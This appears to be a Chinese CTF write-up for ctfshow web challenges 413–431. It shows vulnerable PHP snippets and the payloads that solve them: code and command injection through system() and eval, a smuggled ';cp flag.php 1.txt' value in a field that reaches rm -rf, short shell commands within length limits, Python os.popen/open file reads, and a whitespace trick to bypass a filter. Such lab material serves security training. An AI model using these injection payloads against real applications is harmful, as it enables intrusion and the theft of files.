ctfshow 其他 web入门 web413--web431

web413

ctfshow=*/system('cat flag.php');/*

记得查看源码，或者用bp，我反正是愣了一会儿

web414

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-25 23:07:21
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-26 16:43:53
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

highlight_file(__FILE__);
include('flag.php');
$ctfshow=$_GET['ctfshow'];

if($ctfshow==true){
    if(sqrt($ctfshow)>=sqrt(intval($flag))){
        echo 'FLAG_NOT_HERE';
    }else{
        echo $flag;
    }
} 

利用函数漏洞

?ctfshow=-1

web415

大写绕过

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-25 23:07:21
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-26 19:15:52
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
error_reporting(0);
highlight_file(__FILE__);

$k = $_GET[k];

function getflag(){
    echo file_get_contents('flag.php');
}

if($k=='getflag'){
    die('FLAG_NOT_HERE');
}else{
    call_user_func($k);
}

?k=getFlag

web416

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-25 23:07:21
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-26 19:54:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
error_reporting(0);
highlight_file(__FILE__);

class ctf{
    public function getflag(){
        return 'fake flag';
    }
    final public function flag(){
        echo file_get_contents('flag.php');
    }
}

class show extends ctf{
    public function __construct($f){
        call_user_func($f);
    }
}

echo new show($_GET[f]); 

调用函数

?f=ctf::flag

web417

将文件处理了

include('flag.php');
$c=$_GET['ctf'];
if($c=='show'){
	echo $flag;
}else{
	echo 'FLAG_NOT_HERE';
}
?>

?ctf=show

web418

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-25 23:07:21
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-26 23:52:58
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
$key= 0;
$clear='clear.php';
highlight_file(__FILE__);

//获取参数
$ctfshow=$_GET['ctfshow'];
//包含清理脚本
include($clear);


extract($_POST);
if($key===0x36d){
    //帮黑阔写好后门
    eval('<?php '.$ctfshow.'?>');
}else{
    $die?die('FLAG_NOT_HERE'):clear($clear);
}
function clear($log){
    shell_exec('rm -rf '.$log);
} 

用不了后门我们使用命令执行来

POST:
die=0&clear=;cp flag.php 1.txt

web419

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-25 23:07:21
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-29 01:36:24
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


highlight_file(__FILE__);
$code = $_POST['code'];
if(strlen($code) < 17){
    eval($code);
} 

我只能说17个字符很长

code=eval($_POST[1]);&1=system('cat flag.php');

web420

<?php
highlight_file(__FILE__);


$code = $_POST['code'];
if(strlen($code) < 8){
    system($code);
} 

?code=ls
?code=nl ../*

8个字符就有点意思了

web421

<?php
highlight_file(__FILE__);


$code = $_POST['code'];
if(strlen($code) < 6){
    system($code);
} 

code=nl f*

web422

<?php
highlight_file(__FILE__);


$code = $_POST['code'];
if(strlen($code) < 5){
    system($code);
} 

code=nl *

web423

这里扫后台也是什么都没有扫到，只能尝试python的语法命令结果成功了

?code=os.popen('ls /').read()
?code=open('/flag').read()

web424

?code=open('/flag').read()

web425–web428

?code=open('/flag').read()
直接打爽了

web429–web431

过滤了open但是只会过滤字符串的开头我们可以加个空格就绕过了

?code= open('/flag').read()